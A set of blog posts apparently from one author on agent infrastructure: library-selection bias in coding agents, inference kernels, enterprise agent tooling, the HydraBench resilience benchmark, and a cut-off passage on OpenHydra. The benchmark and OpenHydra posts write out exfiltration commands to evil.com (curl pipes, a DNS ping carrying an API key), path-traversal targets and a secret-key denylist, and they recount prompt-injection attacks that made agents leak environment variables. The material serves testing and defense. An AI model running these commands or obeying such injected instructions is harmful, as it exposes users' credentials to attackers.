[{"content":"Spin up Claude Code, describe a task, and when you come back you find it having chosen pandas for a job where polars would&rsquo;ve been 10x faster. Or imported NumPy where no math was needed at all. This kept happening, and I kept modding AGENTS\/CLAUDE.md to patch it, until I started seeing these failures as something we all know too well: cognitive biases.\nCognitive biases are evolution&rsquo;s solution for speed over accuracy. Agents suffer from selection biases; training optimizes for next-token prediction over fitness-for-purpose. Malberg et al. tested 30 known cognitive biases across 20 LLMs and found evidence of all 30 in at least some models. Zhou et al. then studied bias specifically in LLM-assisted software development and found that 48.8% of programmer actions are biased, with LLM interactions accounting for 56.4% of those biased actions.\nEvery time you use agents you can see behavioural biases that can be mapped to specific failure modes. Think of biases but the agent mode of it:\nAgent Selection Biases Human cognitive biases \u2192 Agent failure modes (click to expand)\nPOPULARITY + HUMAN Follow the crowd AGENT Follow the corpus 48% unnecessary NumPy Express always. npm over bun. Twist et al. found LLMs overuse NumPy in 48% of cases where it&rsquo;s unnecessary. Developers on HN noticed Claude Code picks Express for every JavaScript backend. The Claude Code lead dev had to put &ldquo;Use bun&rdquo; in his own CLAUDE.md because the agent defaults to npm. Polars has twice the GitHub star growth rate of pandas, but agents never pick it. TEMPORAL + HUMAN Recency bias AGENT Frozen at training cutoff 1 in 5 deps safe javax over jakarta. Agents are frozen at their training cutoff, recommending whatever dominated circa 2022-2024. ThoughtWorks documented this: without code examples in prompts, LLMs default to javax.persistence (superseded years ago) instead of jakarta.persistence. Ask for a lightweight alternative to Intercom and you get Zendesk; &ldquo;like asking for a bicycle and being handed a bus.&rdquo; Endor Labs reported in 2025 that only 1 in 5 AI-recommended dependency versions are safe. ANCHORING + HUMAN First info dominates AGENT Prior context bleeds URLs misapplied cross-domain mongodb \u2192 python.org\/docs Huang et al. showed that prior context influences outputs even when not explicitly referenced. Carey observed this at MongoDB: an agent that visited mongodb.com\/docs would later try python.org\/docs instead of the correct docs.python.org. Gemini shoved shadcn\/ui into a React dashboard mid-2025 without being asked; the HN discussion couldn&rsquo;t settle whether it was training-data prevalence, Tailwind synergy, or contextual anchoring. Probably all three. DEFAULT + HUMAN Can&#39;t change behavior AGENT Can&#39;t change training 58% Python. 0% Rust. Python always. Rust never. Python gets chosen 58% of the time for high-performance tasks where it&rsquo;s suboptimal. Rust is never chosen; not once, across eight models in the Twist study. The model has a default, and unless you override it in the context window, it&rsquo;ll reach for Python the way we reach for our phone. SURVIVORSHIP + HUMAN Neglect the filtered AGENT Invisible if not in corpus Polars invisible (2x stars) Plotly: 1 task, 3 models. If your library wasn&rsquo;t in the training corpus, it doesn&rsquo;t exist to the agent. Plotly outpaces Matplotlib on growth signals but gets used for one problem by three models. The library might be objectively better, but if it wasn&rsquo;t visible during training, it&rsquo;s also invisible during inference. CONFABULATION + HUMAN No human analogue AGENT Invents libs confidently Pareto boundary sparse Slopsquatting attacks. Krishna et al. found the Pareto boundary between code quality and package hallucination is sparsely populated. slopsquatting: someone registers the hallucinated package name with malicious code. The agent isn&rsquo;t uncertain; it&rsquo;s wrong with full conviction. The feedback loop LLMs now frequently augment training data with self-generated code, and library favoritism in that synthetic data creates a feedback loop that further reduces diversity. Improta et al. confirms this: low-quality patterns in training data directly increase the probability of generating low-quality code at inference time.\nTaivalsaari and Mikkonen call this the next chapter of software reuse: agents trusting an oracle whose training data predates the current API surface. The popularity contest is being run by the training corpus itself.\nThe supply chain risk compounds this. Today, the litellm PyPI package was compromised (97 million downloads\/month). A poisoned version exfiltrated SSH keys, cloud credentials, and API keys from every machine that installed it. The attack was discovered because an MCP plugin inside Cursor pulled litellm as a transitive dependency, the poisoned version crashed the machine, and someone noticed. Karpathy&rsquo;s reaction:\n&ldquo;Classical software engineering would have you believe that dependencies are good (we&rsquo;re building pyramids from bricks), but imo this has to be re-evaluated, and it&rsquo;s why I&rsquo;ve been so growingly averse to them, preferring to use LLMs to &lsquo;yoink&rsquo; functionality when it&rsquo;s simple enough and possible.&rdquo; \u2014 Andrej Karpathy, March 24, 2026\nWhen agents both choose dependencies blindly AND can write functionality from scratch, the question of import vs generate stops being academic. The biases push agents toward importing established libraries. The supply chain pushes toward generating from scratch. Something has to give.\nThe discovery mess So what do you do about this? I&rsquo;ve spent the last few months trying every layer of the emerging discovery stack, and it&rsquo;s a mess at the moment. Nothing&rsquo;s just drop it in and it will work.\nI shipped llms.txt files pointing to markdown docs. I configured MCP servers and A2A capability cards. I tested Context7 (24K+ indexed libraries) and browsed Smithery (128K+ skills). I watched Claude Code&rsquo;s skill system and Cursor&rsquo;s extensions start forming something like app stores inside agent workflows. These layers overlap, compete, and most are less than a year old. Noma Security&rsquo;s ContextCrush disclosure showed these channels are also emerging security loopholes.\nThe tooling&rsquo;s catching up and emerging fast in this space but not fast enough to keep pace at which automated code gen is permeating into our codebases. Stainless now generates MCP servers from OpenAPI specs. Context7 compiles docs into portable agent skills. Drift scans codebases and maps 150+ conventions for agent consumption. Adding rules to AGENTS.md \u2014 pandas over polars, deprecated APIs \u2014 is probably the single most effective correction today. Scott AI (YC F25) is building a neutral decision layer, arguing that coding agents are biased toward their own tooling.\nExploit or Patch? As these biases proliferate it opens both opportunities for improving as well as opens up temporary gaps that infra builders can exploit to get an advantage in distribution.\nOpen source becomes agent source If the primary consumer is now an agent whose selection biases are well-documented and predictable, the conventions built for human developers (stars, READMEs, conference talks) need rebuilding for models. The ecosystem was built for a different cognitive system. Packaging forks. Libraries ship as npm or PyPI packages. Agents want MCP servers, SKILL.md files, agent.json capability cards. The question is whether agent-native packaging becomes primary, with human-readable packaging as secondary.\nDo stars give way to corpus presence? Twist et al.&rsquo;s feedback loop means training-data representation drives selection more than any human signal. Getting your library into widely-used repos may matter more than accumulating stars. Discovery shifts from social proof to training-data SEO.\nAre agent biases going to be exploited or patched? Both are already happening. Noma Security&rsquo;s researcher manufactured Context7&rsquo;s trending badges and top-4% rankings using nothing but fake API requests; no real adoption needed. As one HN commenter put it: &ldquo;This is where LLM advertising will inevitably end up: completely invisible.&rdquo; On the correction side, Zhou et al.&rsquo;s bias taxonomy comes with mitigations: AGENTS.md overrides, framework comparison tools, TDD to catch biased suggestions. Context7 provides current docs regardless of stale training data. Scott AI decouples library selection from the biased execution agent. Whether agent source produces a healthier or more monocultural ecosystem depends on which side moves faster.\nThe blast radius is still evolving but we are already in the middle-game of the coding agent era.\nModel harnesses are quickly waking up and adapting; Opus 4.6&rsquo;s defaults to zustand over redux where earlier versions didn&rsquo;t, and dropped Redis for caching in cases where it was over-engineered. But model-level correction and corpus-level bias operate on different timescales, and the corpus moves slower. 30 biases across 20 models -&gt; not just noise anymore + the 48% unneeded library usage across models is a pattern, not just an edge case anymore.\nOpen source is rapidly evolving into the agent source era. Getting preferred by agents is how you find distribution for your next software library. References Zhou et al., &ldquo;Cognitive Biases in LLM-Assisted Software Development,&rdquo; Jan 2026 Malberg et al., &ldquo;A Comprehensive Evaluation of Cognitive Biases in LLMs,&rdquo; Oct 2024 Twist et al., &ldquo;A Study of LLMs&rsquo; Preferences for Libraries and Programming Languages,&rdquo; Mar 2025 Improta et al., &ldquo;Quality In, Quality Out: Investigating Training Data&rsquo;s Role in AI Code Generation,&rdquo; Mar 2025 Krishna et al., &ldquo;Importing Phantoms: Measuring LLM Package Hallucination Vulnerabilities,&rdquo; Jan 2025 Huang et al., &ldquo;An Empirical Study of the Anchoring Effect in LLMs,&rdquo; May 2025 Taivalsaari &amp; Mikkonen, &ldquo;On the Future of Software Reuse in the Era of AI Native Software Engineering,&rdquo; Aug 2025 Carey, &ldquo;Agent-Friendly Docs,&rdquo; Feb 2026 Howard, &ldquo;The \/llms.txt file,&rdquo; Sep 2024 Noma Security, &ldquo;ContextCrush: The Context7 MCP Server Vulnerability,&rdquo; Mar 2026 ThoughtWorks, &ldquo;How far can we push AI autonomy in code generation?,&rdquo; Aug 2025 Woolf, &ldquo;An AI agent coding skeptic tries AI agent coding,&rdquo; Feb 2026 Endor Labs, &ldquo;AI Code Suggestions and Dependency Safety,&rdquo; 2025 ","permalink":"https:\/\/mercurialsolo.github.io\/posts\/agent-source\/","summary":"Coding agents now choose most of the libraries. And they choose badly, in predictable ways. 48% unnecessary library usage across eight models. 30 out of 30 cognitive biases confirmed across 20 LLMs. Open source is becoming agent source.","title":"Agent Source"},{"content":"In the software era, applications did wildly diverse things (auth, payments, search, analytics) so the only common abstraction was the process itself. The container became the basic unit of cloud computing. The infra to power it produced a $300B+ cloud infrastructure market.\nThe unit has shifted down the stack Transformers have reduced the base unit of computation to a small set of operations: matrix multiplication, attention, softmax, layer normalization, expert routing. The unit of optimization has moved lower down the stack. You no longer abstract at the process level; you optimize at the operation level. In the models era, the unit of computation is closer to the silicon. Models need their Kernels Between a model&rsquo;s math and the silicon sits a layer of code that determines whether inference costs $0.001 or $0.01 per token, whether latency is 50ms or 500ms, whether one GPU serves 10 or 100 concurrent users. When a transformer processes a prompt, it launches a kernel that tiles Q, K, V matrices into blocks that fit in fast on-chip SRAM, computes partial results, writes output back to slower HBM. How that kernel manages memory access patterns and instruction scheduling impacts performance much more than any model architecture decision.\nTransformer inference is memory-bound, not compute-bound. GPUs multiply matrices faster than memory can feed them data. The optimization target isn&rsquo;t just your FLOPs, rather how fast can you move data. Workload shape determines Kernel design MLPerf Inference benchmark suite tests four scenarios that capture distinct workload shapes: Offline (maximum throughput, all samples at once), Server (Poisson-distributed queries under latency SLA), Single Stream (minimum latency, one query at a time), and the newer Interactive scenario with tighter latency constraints for agentic and conversational applications.\nThey map directly to which kernel optimizations matter:\nHigh-batch offline workloads (document processing, batch embeddings) are compute-bound. Kernel optimization focuses on maximizing tensor core utilization, FP8\/FP4 quantization, and large-tile GEMM configurations. The NVIDIA Blackwell platform holds every per-GPU MLPerf record because its 5th-gen tensor cores and native FP4 support dominate these scenarios. Low-batch interactive workloads (chatbots, code assistants, voice AI) are memory-bound. Each decode step generates one token per sequence, making arithmetic intensity extremely low. Here, FlashAttention&rsquo;s memory-traffic reduction, speculative decoding&rsquo;s parallelized verification, and PagedAttention&rsquo;s batch-size amplification matter most. Mixed prefill\/decode workloads (real-time serving with variable prompt lengths) stress both regimes simultaneously. Disaggregated prefilling separates compute-heavy prompt processing from memory-heavy decode, routing each to differently optimized kernel configurations. Kernel improvements now happen in months, not years. As AI apps move into the consumer and enterprise landscape, the workload also keeps shifting (longer contexts, multimodal inputs, reasoning chains, MoE routing) and each shift demands a brand new set of kernel specializations.\nFor app builders Your workload profile is your kernel strategy. A coding assistant (long prefill, short decode, low concurrency) needs entirely different kernel trade-offs than a customer support bot (short prefill, long decode, high concurrency). Most teams run generic inference and leave 2-5x performance on the table. Profile your actual traffic: what&rsquo;s your prefill\/decode ratio? Your p50 vs p99 sequence length? Your batch size distribution by hour? Those numbers determine whether you should optimize for FlashAttention-style memory reduction, PagedAttention-style batching, speculative decoding, or quantization. At scale, this becomes defensibility: a company that understands its workload shape well enough to select (or commission) the right kernel configuration has structurally lower cost-per-token than a competitor running defaults on the same hardware. What innovation in the kernel looks like? FlashAttention delivered 2-4x speedups by rethinking how attention uses GPU memory. Four generations later, FlashAttention-4 reaches 1605 TFLOPs\/s on Blackwell (71% hardware utilization). PagedAttention cut KV cache memory waste from 60-80% to under 4%, improving throughput 2-4x. Quantization kernels compress weights to 4-bit with 3x speedups. Speculative decoding reaches 500 tok\/s on DeepSeek-V3.1.\nEach of these upgrades are the building block underwriting billion-dollar outcomes: FlashAttention is core IP behind Together AI ($12.6B); PagedAttention powers vLLM, now the default serving engine across the industry; quantization kernels enabled llama.cpp to put 70B models on consumer hardware, catalyzing the open-weight ecosystem; speculative decoding is what makes Groq&rsquo;s $20B NVIDIA licensing deal economically viable at scale. Discovering kernels Kernel discovery follows a tight loop:\nThe creative work here is restructuring tile sizes, memory access patterns, instruction ordering, fusing operations to eliminate HBM writes.\nThe domain has perfect verifiability: TFLOPs\/s against theoretical hardware peak. That verifiability makes kernel optimization tractable for AI agents. Karpathy&rsquo;s autoresearch pattern (edit code, run experiment, evaluate, keep or revert, repeat) was immediately adapted for kernels. AutoKernel takes any PyTorch model, profiles it, extracts bottleneck operations, then runs 300+ automated experiments on Triton or CUDA C++ kernels overnight. NVIDIA demonstrated a closed-loop workflow using DeepSeek-R1 with a hardware verifier to auto-generate optimized attention kernels, achieving 100% numerical correctness on Stanford&rsquo;s KernelBench Level-1 problems and 96% on Level-2 in just 15 minutes of inference-time compute per problem.\nSelf-improving kernels AI models are now writing the kernels that make AI models run faster.\nBut the humans behind them still define the search space, set the objective function, and architect the verification infrastructure. The autoresearch loop accelerates kernel discovery; it hasn&rsquo;t yet replaced the insight that decides the operations to fuse or which memory access pattern to rethink about.\nThe new lever for scale Inference engines (vLLM, TensorRT-LLM, SGLang) are kernel orchestrators: they select kernels, batch requests, schedule phases, choose precision, parallelize across GPUs. They sit in the middle of a value chain where applications consume inference, models define computation, and kernels execute on silicon.\nValue concentrates at the kernel layer because the margins of error are razor-thin and the talent is still scarce. A misaligned memory access or suboptimal tile size means 2x slower on identical hardware. Understanding GPU memory hierarchy isn&rsquo;t enough; you need the insight to rethink the algorithm itself (online softmax, pingpong scheduling, asymmetric hardware pipelining). You can&rsquo;t yet vibe-code a CUDA kernel. You can&rsquo;t prompt-engineer your way to 71% hardware utilization on Blackwell. Together AI, Tri Dao&rsquo;s lab at Princeton, NVIDIA&rsquo;s CUTLASS team, a handful of engineers at Fireworks and Meta: entire industry runs on a handful of frontier talent and arcane techniques.\nHyperscalers emerged because running applications at scale was too complex to do in-house. The models era is producing inference providers: Together AI ($12.6B), Fireworks AI ($4B), Groq, Cerebras, Baseten ($5B), DeepInfra, SambaNova. They compete on kernel quality, hardware optimization, and serving infrastructure.\nCloud Hyperscalers Inference Providers Abstracted servers + networking Abstract GPUs + kernel optimization Competed on price\/performance per VM Compete on cost\/latency per token Built proprietary hardware (Graviton, TPU) Build proprietary kernels, some build custom silicon Economies of scale drove margins Kernel efficiency compounds across fleet Vendor lock-in via platform services Lock-in via optimized model serving + fine-tuning Together AI co-authors FlashAttention and maintains the Together Kernel collection. Fireworks was built by ex-PyTorch engineers, serving 10T+ tokens\/day. Groq built entirely custom silicon. Each has a kernel-level moat. The market is already stratifying: custom silicon (Groq, Cerebras) on raw speed, GPU platforms (Together AI, Fireworks, Baseten) on flexibility, API-first (DeepInfra, Replicate) on simplicity. IaaS, PaaS, and managed services, reborn for inference.\nThe cost model Cost per Token = (GPU Cost per Hour) \/ (Tokens per Second * 3600 * Utilization)\nAn H100 at ~$3\/hour with baseline FP16 kernels at 50% utilization costs ~$1.66\/M tokens. FlashAttention-3 + FP8 quantization doubles throughput, pushes utilization to 80%. Combined kernel optimization drops cost below $0.50\/M tokens on the same hardware. Groq serves Llama 3.1 8B at $0.05\/M input tokens. The gap between generic and optimized inference is 2-7x.\nYesterday, I was having a conversation around how do you find durable alpha when the underlying techniques and models are evolving so rapidly. My take, in fast-moving domains, you don&rsquo;t build walls; you build speedier engines.\nLocate the specific leverage points in your stack where small gains compound across scale, where the domain is verifiable enough to iterate fast, and where expertise is scarce enough that the advantage holds while you accelerate. Find the kernels.\nReferences Dao, T. et al. (2022). &ldquo;FlashAttention: Fast and Memory-Efficient Exact Attention with IO-Awareness.&rdquo; arXiv:2205.14135 Dao, T. (2023). &ldquo;FlashAttention-2: Faster Attention with Better Parallelism and Work Partitioning.&rdquo; arXiv:2307.08691 Zadouri, T. et al. (2026). &ldquo;FlashAttention-4: Algorithm and Kernel Pipelining Co-Design.&rdquo; Together AI Kwon, W. et al. (2023). &ldquo;Efficient Memory Management for LLM Serving with PagedAttention.&rdquo; arXiv:2309.06180 Tillet, P. et al. (2021). &ldquo;Introducing Triton: Open-source GPU programming for neural networks.&rdquo; OpenAI Frantar, E. et al. (2022). &ldquo;GPTQ: Accurate Post-Training Quantization for Generative Pre-trained Transformers.&rdquo; arXiv:2210.17323 Lin, J. et al. (2023). &ldquo;AWQ: Activation-aware Weight Quantization for LLM Compression and Acceleration.&rdquo; arXiv:2306.00978 Together AI. (2025). &ldquo;Best practices to accelerate inference for large-scale production workloads.&rdquo; Together AI Groq. (2025). &ldquo;What is a Language Processing Unit?&rdquo; Groq Groq. (2025). &ldquo;Inside the LPU: Deconstructing Groq&rsquo;s Speed.&rdquo; Groq NVIDIA. (2026). &ldquo;Tuning Flash Attention for Peak Performance in NVIDIA CUDA Tile.&rdquo; NVIDIA Upadhyay, A. (2024). &ldquo;The Architecture of Groq&rsquo;s LPU.&rdquo; Coding Confessions vLLM Blog. (2023). &ldquo;vLLM: Easy, Fast, and Cheap LLM Serving with PagedAttention.&rdquo; vLLM NVIDIA. (2017). &ldquo;CUTLASS: Fast Linear Algebra in CUDA C++.&rdquo; NVIDIA Together AI. (2024). &ldquo;Announcing Together Inference Engine 2.0.&rdquo; Together AI IBM. (2025). &ldquo;From microservices to AI agents: The evolution of application architecture.&rdquo; IBM Think Leviathan, Y. et al. (2023). &ldquo;Fast Inference from Transformers via Speculative Decoding.&rdquo; arXiv:2302.01318 Cerebras. &ldquo;Wafer-Scale Engine Overview.&rdquo; EmergentMind d-Matrix. (2025). &ldquo;Why optimizing every layer of AI workloads is now critical.&rdquo; d-Matrix Pure Storage. (2025). &ldquo;LPU vs GPU: What&rsquo;s the Difference?&rdquo; Pure Storage ","permalink":"https:\/\/mercurialsolo.github.io\/posts\/find-the-kernels\/","summary":"Model weights are open. APIs are commodity. The defensible value in the models era lives in the kernel layer, where small efficiency gains compound across GPU fleets and the talent pool is measured in hundreds.","title":"Find the Kernels"},{"content":"I&rsquo;ve been running OpenClaw for personal use and the first reaction: it works as a basic personal assistant. Browser as the universal tool, Slack and WhatsApp and email as the comms layer and the event stream, the filesystem as the memory layer. They come together well when we own everything the agent touches. Authentication, authorization, data governance: no-problem, especially when the user and the admin are the same person.\nThe harness looks straightforward: let&rsquo;s now bolt on SSO, add an admin panel, and start selling it to teams. Not so easy, because the failure modes run deeper than what is evident at the surface.\nAgents should ideally be doing useful work at 2am; research, briefings, competitive analysis ready before the team logs in Monday. The agents we have today can&rsquo;t sustain that. Run one autonomously for four hours and the reasoning frays; by step 12 of a 20-step plan, it&rsquo;s optimizing for something adjacent to what you asked. Models don&rsquo;t stick to plans over long task horizons the way a human with a checklist does.\nOnce the context window is exhausted, each run starts cold. An agent that spent Tuesday learning which Salesforce filters return garbage and which Slack channels carry real decisions has none of that on Wednesday. There&rsquo;s no persistent memory across multiple agents, and no fleet-wide learning loop; when one agent discovers a data source is stale, no other agent in the org benefits. The same lessons get relearned independently, at the same token cost, across every team. Agents may have their internal memory but no shared org wiki.\nTool access at personal scale is like your apartment key; at org scale it&rsquo;s like a contractor badge scoped per floor, per hour, per task, re-evaluated on every action. OAuth handles per-app grants, not per-agent, per-task grants at runtime. IAM policies don&rsquo;t model &ldquo;this agent is on Q3 planning, so it reads the finance channel but not HR.&rdquo;\nYour personal subscription cap is a safety net, but 50+ agents running overnight spin up costs that no finance team can predict. SaaS budgeting assumes per-seat pricing; agent costs scale with task complexity and parallelism, varying 10x by scope.\nContext provisioning (dynamically granting need-to-know access with audit trails compliance will accept) is possibly the hardest of the lot, because agents ingest data continuously rather than requesting it once, and they don&rsquo;t know what they don&rsquo;t know they need. It&rsquo;s a continuous token stream.\nThe enterprise claw needs abstractions that don&rsquo;t exist in polished form for agents:\na tool policy layer for runtime interaction scoping a budget-aware scheduler that enforces spend envelopes per project and team a context provisioning engine for dynamic need-to-know access with audit trails This bring to me my personal RFS for agents.\nRequest for Agent Infrastructure Wiki for Agents There&rsquo;s no persistent memory across runs, no fleet-wide learning loop. When one agent discovers a data source is stale, no other agent in the org benefits. Same lessons relearned independently, at the same token cost, across every team. Multi-agent pipelines consume 15x more tokens than single-agent chats because every agent starts from zero context.\nEvery cloud provider offers some memory primitive; none solve fleet-wide knowledge sharing with tenant isolation. The opportunity is the organizational memory layer between agent runtime and knowledge store. You&rsquo;d start single-team, prove token savings, then expand to cross-team sharing. Usage grows with agent adoption; the data flywheel makes it hard to rip out.\nIAM for Agents OAuth handles per-app grants, not per-agent per-task grants at runtime. IAM policies don&rsquo;t model &ldquo;this agent is on Q3 planning, so it reads the finance channel but not HR.&rdquo; Agents are non-deterministic, autonomous, and act through toolchains at machine speed.\nThe incidents are everywhere around us. Supabase MCP exfiltrated integration tokens via prompt injection (June 2025). Stolen OAuth tokens from Salesloft&rsquo;s Drift accessed hundreds of Salesforce instances (August 2025). Amazon&rsquo;s Kiro deleted an entire AWS environment, 13-hour outage.Pretty much every incident was an over-broad credentials on autonomous systems.\nYou&rsquo;d build intent-based authorization: agents declare what they need, the system generates minimum-viable permissions, monitors drift, flags violations. Start with one SaaS surface, expand connector coverage. Integration breadth is the moat.\nRamp for Agents Agent costs scale with task complexity and parallelism, varying 10x by scope. A research agent can burn $47 in a single unsupervised session. 92% of businesses implementing agentic AI experience cost overruns (IDC). Gartner predicts over 40% of agentic AI projects cancelled by 2027 due to runaway costs.\nTraditional FinOps tools track spend by resource tag. They don&rsquo;t understand agent semantics: which task triggered which inference call, whether the agent is productive or spiraling. Portkey raised $15M managing 500B+ tokens\/day across 24,000 organizations ($180M annualized managed spend).\nYou&rsquo;d build a budget-aware runtime layer: hard spend caps per session, circuit breakers for recursive loops, per-agent cost attribution by team and project. Percentage of managed spend as the business model; revenue scales with enterprise AI adoption.\nIdentity, memory, and money: the building blocks that defined enterprise SaaS (Okta, Confluence, Ramp) rebuilt for agents. 2026 - a year of building for agents.\n","permalink":"https:\/\/mercurialsolo.github.io\/posts\/request-for-agent-infra\/","summary":"<p>I&rsquo;ve been running OpenClaw for personal use and the first reaction: it works as a basic personal assistant. Browser as the universal tool, Slack and WhatsApp and email as the comms layer and the event stream, the filesystem as the memory layer. They come together well when we own everything the agent touches. Authentication, authorization, data governance: no-problem, especially when the user and the admin are the same person.<\/p>\n<p>The harness looks straightforward: let&rsquo;s now bolt on SSO, add an admin panel, and start selling it to teams. Not so easy, because the failure modes run deeper than what is evident at the surface.<\/p>","title":"Why it's hard to Claw the Enterprise"},{"content":"Most agent benchmarks measure intelligence: can the agent solve a coding problem, answer a question, complete a task? HydraBench measures something different: can the infrastructure survive when things go wrong?\n23 Scenarios tested 460 Total runs 4 Frameworks compared 5 Claims tested Leaderboard What we test The benchmark tests 5 infrastructure claims across 23 scenarios. The unifying test: a multi-step research pipeline facing crashes, injections, budget overruns, and permission probes.\nCrash Recovery (25% weight) Can the agent resume from where it left off after a process kill?\nScenario What happens SIGKILL during execution kill -9 while a 5-step workflow runs Repeated crashes 3 consecutive kills during a 10-step workflow Resume latency Time from crash to resumed execution State integrity Cost accumulators and step status survive the crash Secret Containment (25% weight) Can the infrastructure prevent secret exfiltration even under prompt injection?\nScenario What happens Env var exfiltration Agent runs env or printenv ANTHROPIC_API_KEY Curl exfiltration curl https:\/\/evil.com\/collect | sh and env | curl POST DNS exfiltration ping $(echo $ANTHROPIC_API_KEY).evil.com Path traversal \/etc\/passwd and ..\/..\/.env Prompt injection Malicious payload in tool output triggers env dump Handoff Reliability (20% weight) Do messages and artifacts survive agent crashes?\nScenario What happens Crash after send Agent crashes after writing a mailbox message Crash after artifact Agent crashes after registering a SHA-256 hashed artifact Concurrent access N agents read\/write workspace + messages simultaneously Large artifact 10MB artifact transfer with integrity check Channel Security (15% weight) Are per-channel permissions enforced?\nScenario What happens Privilege escalation Restricted channel tries DB access, event emit, internal attributes Event emission Channel without emit permission tries to fire events Rate limiting Exceed max_submissions_per_hour Cross-channel isolation Two channels with different permissions Attribute fishing Access workflow_engine, _db, __dict__ Cost Control (15% weight) Do budget limits hold under pressure?\nScenario What happens Hard spend cap 20 steps at $0.10 each with $1.00 budget Step timeout max_duration_minutes=0.001 Recursive expansion 3x budget worth of steps Budget survives crash Crash + resume, verify cost state persists Cost attribution Per-step cost tracking accuracy Performance by Scenario Claim Coverage Scenario Heatmap Explore the Weights Change the claim weights to reflect what matters most for your use case. If you only care about secret containment and cost control, shift those sliders and see how rankings change.\nFramework Comparison Capability OpenHydra LangGraph CrewAI Bare Agent Crash recovery SQLite WAL StateGraph checkpoints None None Secret stripping _SENSITIVE_ENV_KEYS None None None Durable mailbox SQLite-backed None None None Durable workspace SHA-256 artifacts File I\/O (no ACL) None None Channel permissions RestrictedEngine proxy None None None Rate limiting Sliding window None None None Budget gates Per-session caps None None None Step timeout max_duration_minutes asyncio.timeout None None Cost attribution Per-step tracking None None None Frameworks scoring 0 on a claim lack the capability entirely. This isn&rsquo;t &ldquo;they tested poorly&rdquo;; it&rsquo;s &ldquo;there is no equivalent feature.&rdquo; LangGraph&rsquo;s partial scores (crash recovery, workspace, timeout) reflect real capabilities that don&rsquo;t cover the full claim.\nMethodology 5 runs per framework per scenario Mean + standard deviation reported for all metrics Wilcoxon signed-rank test (p &lt; 0.05) for pairwise framework comparison Mock executors (no real LLM calls): results are deterministic, free, and reproducible Weighted scoring: Crash Recovery 25%, Secrets 25%, Handoffs 20%, Channels 15%, Cost 15% Open source: Full harness at github.com\/openhydra\/bench Running it yourself git clone https:\/\/github.com\/openhydra\/openhydra cd openhydra python -m bench.hydrabench --frameworks OpenHydra LangGraph CrewAI &#34;Bare Agent&#34; Results write to bench\/results\/latest.json. Generate the HTML report:\npython -m bench.hydrabench --output html Read the article This benchmark backs the claims in Designing a World for Agents, which walks through the real incidents that motivated each of these tests.\n","permalink":"https:\/\/mercurialsolo.github.io\/projects\/hydrabench\/","summary":"23 scenarios, 4 frameworks, 460 runs. HydraBench tests what most agent benchmarks ignore: does your infrastructure survive crashes, contain secrets, deliver handoffs, enforce permissions, and control cost?","title":"HydraBench: Agent Infrastructure Resilience"},{"content":"The browser agent had been running for forty minutes when it visited a page with a hidden instruction to curl our environment variables. The denylist caught this activity. Without that strip, the ANTHROPIC_API_KEY would have been on someone else&rsquo;s machine - we weren&rsquo;t watching the agent. This was Tuesday.\nBy Friday we&rsquo;d also watched a research agent forget 22 sources of work overnight, a multi-agent pipeline lose a handoff to a crash, and a content agent spend $47 in a single unsupervised session. And we aren&rsquo;t the only ones having trouble: in December 2025, Amazon pointed their internal coding agent Kiro at AWS Cost Explorer for a routine update, and Kiro deleted and recreated the entire environment, triggering a 13-hour outage for customers in mainland China.\n22 Sources lost to crash $47 Unsupervised spend 400+ API calls, one session 13hr AWS outage from one agent The agents maybe capable but the worlds we&rsquo;d built for them weren&rsquo;t. I&rsquo;m starting OpenHydra, an open source foundation for running agents with real tools over long-running sessions. Here&rsquo;s what broke and what I&rsquo;ve been building to fix it.\nKilled at source 22 The first real test was a research agent we pointed at 30 sources for an overnight literature review. We went to bed. By morning the agent had died at source 22 after a model timeout, then restarted from source 1, crawled back to source 18, hit another timeout, and restarted from source 1 again. It had burned through three full cycles and was working on source 14 for the fourth time.\nThe problem was obvious in retrospect: agent state lived in memory. When the process died, everything evaporated. The agent had no idea it had already processed 22 sources. As far as it knew, every restart was day one.\nThe fix came from databases. write-ahead-logs have kept data durable since the 1970s; we just applied the same idea to agent state. Before an agent executes a step, it writes the intent to SQLite. After the step completes, it writes the result. Crash at any point? Query the database. If a step shows RUNNING but never reached COMPLETED, it didn&rsquo;t finish. Restart from there.\nhydra\/recovery.py cursor = await self.db.conn.execute( &#34;SELECT id FROM workflows WHERE status = ?&#34;, (WorkflowStatus.EXECUTING.value,), ) rows = await cursor.fetchall() for row in rows: await self.db.conn.execute( &#34;UPDATE steps SET status = ?, error = NULL &#34; &#34;WHERE workflow_id = ? AND status = ?&#34;, (StepStatus.PENDING.value, wf_id, StepStatus.RUNNING.value), ) Without durability Agent dies at source 22. Restarts from source 1. Burns three full cycles overnight. Working on source 14 for the fourth time by morning. With write-ahead state Agent dies at source 22 again (same flaky API). Resumes from source 23 in under a second. No wasted work, no repeated crawls. We now test crash recovery by running kill -9 during active workflow execution and verifying checkpoint recovery. If an agent can&rsquo;t survive a SIGKILL, the state management isn&rsquo;t durable enough. That&rsquo;s the bar.\nSQLite fits single-process agent systems perfectly: single file, portable, no network calls. We&rsquo;ll outgrow it eventually and migrate to Postgres, but for now the simplicity is worth it. Most agent frameworks still pass state through prompts or in-memory dicts. When the agent crashes, the state evaporates with it.\nThe browser agent that kept calling home We were testing a browser agent when it visited a page containing a prompt-injection payload. The page had a hidden instruction telling the agent to curl its environment variables to an external endpoint. Our denylist caught it. Without that explicit strip, the ANTHROPIC_API_KEY would have been exfiltrated in a test session.\nThat was the moment environment isolation became non-negotiable for us. Every agent process inherits the parent&rsquo;s environment variables unless you strip them explicitly, and this isn&rsquo;t theoretical.\n&#9888; This keeps happening in production. Devin was tricked via indirect prompt injection to leak environment variables to an external server. Claude Code was tricked into exfiltrating API keys via DNS queries using the allow-listed ping command. The attack surface is any tool that touches the network; the payload is whatever the agent can read from its own process environment. The design principle Defense by prompting doesn&rsquo;t work. You can tell an agent &ldquo;don&rsquo;t leak secrets&rdquo; and it will comply right up until a sufficiently clever injection tells it otherwise.\nDefense by architecture does.\nhydra\/env_isolation.py _SENSITIVE_ENV_KEYS = { &#34;CLAUDECODE&#34;, &#34;ANTHROPIC_API_KEY&#34;, &#34;OPENAI_API_KEY&#34;, &#34;CLAUDE_CODE_OAUTH_TOKEN&#34;, &#34;OPENHYDRA_WEB_API_KEY&#34;, &#34;OPENHYDRA_SLACK_BOT_TOKEN&#34;, &#34;OPENHYDRA_DISCORD_BOT_TOKEN&#34;, &#34;OPENHYDRA_WHATSAPP_ACCESS_TOKEN&#34;, &#34;TAVILY_API_KEY&#34;, &#34;PERPLEXITY_API_KEY&#34;, } Each agent declares required secrets upfront. No ambient-authority. No implicit inheritance from the parent process. If a key isn&rsquo;t in the agent&rsquo;s declared needs, it doesn&rsquo;t exist in that agent&rsquo;s environment. The denylist is the floor; production deployments should use a proper secret manager. But even this simple list caught an 